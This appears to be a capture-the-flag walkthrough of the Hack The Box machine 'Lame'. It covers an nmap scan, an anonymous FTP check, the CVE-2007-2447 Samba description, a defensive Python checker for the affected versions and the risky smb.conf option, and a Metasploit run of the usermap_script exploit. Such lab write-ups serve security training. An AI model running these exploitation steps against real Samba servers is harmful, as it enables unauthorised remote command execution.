
Lame

Tags: Beginner Track, Easy, Internal Network, SAMBA, Penetration Tester Level 1, Remote Code Execution, CVE-2007-2447, Public Vulnerabilities, CVE Exploitation, Security Tools


$ nmap -sV -sC -Pn --min-rate 5000 10.129.98.0
Starting Nmap 7.92 ( https://nmap.org ) at 2022-05-30 07:01 WIB
Nmap scan report for 10.129.98.0
Host is up (0.27s latency).
Not shown: 996 filtered tcp ports (no-response)
PORT    STATE SERVICE     VERSION
21/tcp  open  ftp         vsftpd 2.3.4
|_ftp-anon: Anonymous FTP login allowed (FTP code 230)
| ftp-syst: 
|   STAT: 
| FTP server status:
|      Connected to 10.10.14.4
|      Logged in as ftp
|      TYPE: ASCII
|      No session bandwidth limit
|      Session timeout in seconds is 300
|      Control connection is plain text
|      Data connections will be plain text
|      vsFTPd 2.3.4 - secure, fast, stable
|_End of status
22/tcp  open  ssh         OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0)
| ssh-hostkey: 
|   1024 60:0f:cf:e1:c0:5f:6a:74:d6:90:24:fa:c4:d5:6c:cd (DSA)
|_  2048 56:56:24:0f:21:1d:de:a7:2b:ae:61:b1:24:3d:e8:f3 (RSA)
139/tcp open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp open  netbios-ssn Samba smbd 3.0.20-Debian (workgroup: WORKGROUP)
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

Host script results:
|_smb2-time: Protocol negotiation failed (SMB2)
| smb-security-mode: 
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
| smb-os-discovery: 
|   OS: Unix (Samba 3.0.20-Debian)
|   Computer name: lame
|   NetBIOS computer name: 
|   Domain name: hackthebox.gr
|   FQDN: lame.hackthebox.gr
|_  System time: 2022-05-29T20:02:31-04:00
|_clock-skew: mean: 2h00m28s, deviation: 2h49m46s, median: 25s

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 70.12 seconds
$ ftp 10.129.98.0
Connected to 10.129.98.0.
220 (vsFTPd 2.3.4)
Name (10.129.98.0:carloz): anonymous
331 Please specify the password.
Password: 
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls -la
.
..
ftp> pwd
"/"
ftp> 

The anonymous FTP share is empty, so nothing to work with there. Looking up CVE-2007-2447 for the Samba 3.0.20 version nmap reported, the description reads:

The MS-RPC functionality in smbd in Samba 3.0.0 through 3.0.25rc3 allows remote attackers to execute arbitrary commands via shell metacharacters involving the (1) SamrChangePassword function, when the "username map script" smb.conf option is enabled, and allows remote authenticated users to execute commands via shell metacharacters involving other MS-RPC functions in the (2) remote printer and (3) file share management.
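The description names two conditions: a Samba version in the 3.0.0 through 3.0.25rc3 range, and the "username map script" option being set in smb.conf. The following check is an added example, not code from this write-up or from the Samba project; it turns those two conditions into something an administrator can run against an nmap service line and an smb.conf. The nmap line is the 445/tcp line from the scan above; the smb.conf text and the script path in it are constructed for the example.

```python
import re

# Affected range taken from the CVE-2007-2447 text: Samba 3.0.0 through 3.0.25rc3.
AFFECTED_LOW = (3, 0, 0, 0)
AFFECTED_HIGH = (3, 0, 25, 3)
FINAL = 10**6  # a final release ranks after any of its release candidates

# The 445/tcp line from the nmap scan above.
SAMPLE_NMAP_LINE = "445/tcp open  netbios-ssn Samba smbd 3.0.20-Debian (workgroup: WORKGROUP)"

# Constructed smb.conf for the example; the script path is made up.
SAMPLE_SMB_CONF = """\
[global]
   workgroup = WORKGROUP
   ; comment lines start with ';' or '#'
   username map script = /usr/local/bin/mapuser.sh
   server string = %h server

[tmp]
   path = /tmp
   writable = yes
"""


def version_key(text):
    """Turn '3.0.20' or '3.0.25rc3' into a sortable tuple; an rc sorts before its final."""
    m = re.fullmatch(r"(\d+)\.(\d+)\.(\d+)(?:rc(\d+))?", text.strip())
    if not m:
        return None
    major, minor, patch, rc = m.groups()
    return (int(major), int(minor), int(patch), int(rc) if rc else FINAL)


def samba_version_from_nmap(line):
    """Pull the Samba version out of an nmap -sV service line, e.g. '3.0.20'."""
    m = re.search(r"Samba smbd (\d+\.\d+\.\d+(?:rc\d+)?)", line)
    return m.group(1) if m else None


def is_affected(version):
    """True if the version falls inside the CVE's affected range."""
    key = version_key(version)
    return key is not None and AFFECTED_LOW <= key <= AFFECTED_HIGH


def username_map_script_enabled(smb_conf):
    """True if [global] sets 'username map script' to a non-empty value.

    Samba parameter names are case-insensitive and ignore internal whitespace,
    and a line whose first character is ';' or '#' is a comment.
    """
    section = None
    for raw in smb_conf.splitlines():
        line = raw.strip()
        if not line or line[0] in "#;":
            continue
        if line.startswith("[") and line.endswith("]"):
            section = line[1:-1].strip().lower()
            continue
        if section != "global" or "=" not in line:
            continue
        key, value = line.split("=", 1)
        if re.sub(r"\s+", "", key).lower() == "usernamemapscript" and value.strip():
            return True
    return False


def assess(nmap_line, smb_conf=None):
    """Return the findings a defender would act on; an empty list means neither condition holds."""
    findings = []
    version = samba_version_from_nmap(nmap_line)
    if version and is_affected(version):
        findings.append(
            f"Samba {version} is inside the CVE-2007-2447 range (3.0.0 - 3.0.25rc3): upgrade"
        )
    if smb_conf is not None and username_map_script_enabled(smb_conf):
        findings.append(
            "'username map script' is set in [global]: remove it until Samba is upgraded"
        )
    return findings


if __name__ == "__main__":
    for finding in assess(SAMPLE_NMAP_LINE, SAMPLE_SMB_CONF):
        print("FINDING:", finding)
```

The version check alone is what the nmap banner gives you from the outside; the smb.conf check is the part only the host owner can do, and it is the one that decides whether the MS-RPC path in the description is actually reachable. Note that nmap's 139/tcp line reports only "3.X - 4.X", so the parser deliberately returns nothing for it rather than guessing.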

$ searchsploit 3.0.20
------------------------------------------------------------------------------------------------------------------------------------ ---------------------------------
 Exploit Title                                                                                                                      |  Path
------------------------------------------------------------------------------------------------------------------------------------ ---------------------------------
CubeCart 3.0.20 - '/admin/login.php?goto' Arbitrary Site Redirect                                                                   | php/webapps/36686.txt
CubeCart 3.0.20 - 'switch.php?r' Arbitrary Site Redirect                                                                            | php/webapps/36687.txt
CubeCart 3.0.20 - Multiple Script 'redir' Arbitrary Site Redirects                                                                  | php/webapps/36685.txt
Maxthon Browser 3.0.20.1000 - ref / replace Denial of Service                                                                       | windows/dos/16084.html
Samba 3.0.20 < 3.0.25rc3 - 'Username' map script' Command Execution (Metasploit)                                                    | unix/remote/16320.rb
Samba < 3.0.20 - Remote Heap Overflow                                                                                               | linux/remote/7701.txt
Spy Emergency 23.0.205 - Unquoted Service Path Privilege Escalation                                                                 | windows/local/40550.txt
------------------------------------------------------------------------------------------------------------------------------------ ---------------------------------
Shellcodes: No Results
$ msfconsole

msf6 > search samba 3.0.20

Matching Modules
================

   #  Name                                Disclosure Date  Rank       Check  Description
   -  ----                                ---------------  ----       -----  -----------
   0  exploit/multi/samba/usermap_script  2007-05-14       excellent  No     Samba "username map script" Command Execution


Interact with a module by name or index. For example info 0, use 0 or use exploit/multi/samba/usermap_script

msf6 > use exploit/multi/samba/usermap_script
msf6 exploit(multi/samba/usermap_script) > show options
...
msf6 exploit(multi/samba/usermap_script) > set RHOSTS <target_ip>
...
msf6 exploit(multi/samba/usermap_script) > exploit

done